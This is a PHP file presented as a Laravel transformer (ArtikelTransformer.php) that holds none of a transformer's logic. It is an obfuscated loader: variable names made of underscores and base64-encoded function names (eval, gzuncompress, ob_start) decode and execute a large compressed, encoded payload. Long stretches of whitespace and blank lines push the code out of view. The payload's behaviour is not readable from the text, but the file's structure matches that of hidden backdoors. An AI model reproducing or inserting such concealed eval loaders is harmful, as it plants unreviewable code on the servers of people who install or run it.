<?php 
        $__='printf';$_='Loading app/Http/Transformers/ArtikelTransformer.php';
        



















































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWluPm0YUfl+p/2EfIjlRql3A626slR8MGzBgO2vshYGXiGFswOYWgy/41/dg8IWUqGmbVmo0H2INw8yZc75zmdFqbm9LvPkM6LWStR9li9bT8bVCr2Unyf0gy5L72dqO0kW8Dufr9L6/zvzVPLhqu0u85FYI7DS9u7trPd1Usm9/uaEXvf7udVME4+0PRO8PLS3EdlPTYH1L+thrHZsu0ftdqBKmd0tBQUHxc6LlhDpDkLKRJZ0zjV2siN0FylePZdGEqlmW68+UKgoKCgoKCgoKCor/G+i/MygoKCh+XrSwnc5/e/hM5k5M5q0nyggFBQUFBcU/Qv0UheAmG9NgA6fNeyb36k4Qv0MfPYYMeEcfKB6OxiFuK5mFlMOnXawSNA7kj+LOEfdjzGkBHoydCVIY28gC/JxW3/eBaRDW0veSE4pLIokpErXcNDoHK+zm2NDziaEcCMg325NH0GGJJfHg5DzvRFpic3pan1t2LeQxltFZQZ9XkLlxOGvrhKD3SvSddiF7zAhRqspC35WFD19UN3bL59h9DfUDbuu5yekHeaDFJpq4JiduZEkJZCnYmNyetSR9Bc+hPFACB+nAhxZYwkMlr/9F8I+/rurzfRKKuSyJOejRubR/KPsO+BzDWPM4nvecSPHm0/7KRJZnG3vPDPfB1Ogs8UBfWWjkvkx5fJJR3AonskTyto7vpPX2sUckPQI+Okq+O+lV3JHJdTPgdEMGo2jYL+1Gs1Stxm9VPz7bIQ+yvm10YvBnQiRta7aZ87fhrhzrDHQfS8FSliwWh2PwbXcDvF38N/XOfpIFzSuegcNAnZTj57v4rHfBJxnoOfbrdpY3SSzBcV9mD64CfBKYE0uv2UsYrE52XNvpFH7KG/pH45QYdb4q+YyNtNSaNs2RsNZAT5vmAZ4fSLNeB3ta477yTZBBvAdK3u+++IWvi3wYw7zMe4KUFHHEw4biOf63x46adIyAN7EbFWdATCTvm3S1DdazuNf8T+deyk38JCA7smajSH5m3l/7cjjrsE64X1icmJkQ76O8QXfIKSx8U2/vFCONvgx1zxK7S8jLTTPXXkKEJr70A/TJTKQFqK1AndESHDpN+u8gxtc2ghpjdBaQH4UdS7PRf+PcMkSoL9oCakOTLMbi9guC+BRzYmNs2pGeQQ2LEZdtj7kItlQ+iSHfGHVa980lZ8cLeGZxNGnyzxpzbIAj0MVv4mgMcx2/H2o6icxjKYvvClUdHObxdQ17nEDdsyU9h/xYYW7cbahjLNSqxMz5kEC9gjm3kMPAdZFrWjBBOmNL3Vx97jbWAgdsl6UOi6VdUunyeG2fbZiu+lX/lxnj4khPsbCq15DjzecW0iAmH1yDZWqyFpNYbeqnQK230ajIW/AtE1+40w/gU48gLcZtOQU9AwJrT/mu1NcX302GRY2t7FXy1b/PLVfEItk60Sp+YY46ry1j517rDzF64qqSmV5zkFgQd1/178JasyHGPlWndV98XaeLteNK1tnOer/+CtapxMmZ92BngKfuJb6PnF/Wq6HAbyzkuNOTXWHQzPHF7kg96TBgfuw6dlnvnyG3MthTME7u3p/3MEL/2g73zFnT2lbsFwS33n/GnOO+7pPyPh9VETPyqbZOnu2s9xM0iLugiNcl5vapZZR21HPnup6MTvE8PNeOoL73UoUV5CpZXux3kpMui0kC/u71Wk83N//9prR3/H1bvb17+ivDr8Z+z8A3lwnftoq/rV/P09IzwvT6EWeE67H2thbcZai9e/od8ovVxg==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































































































































                                                                                                                                                                                                                     $________;
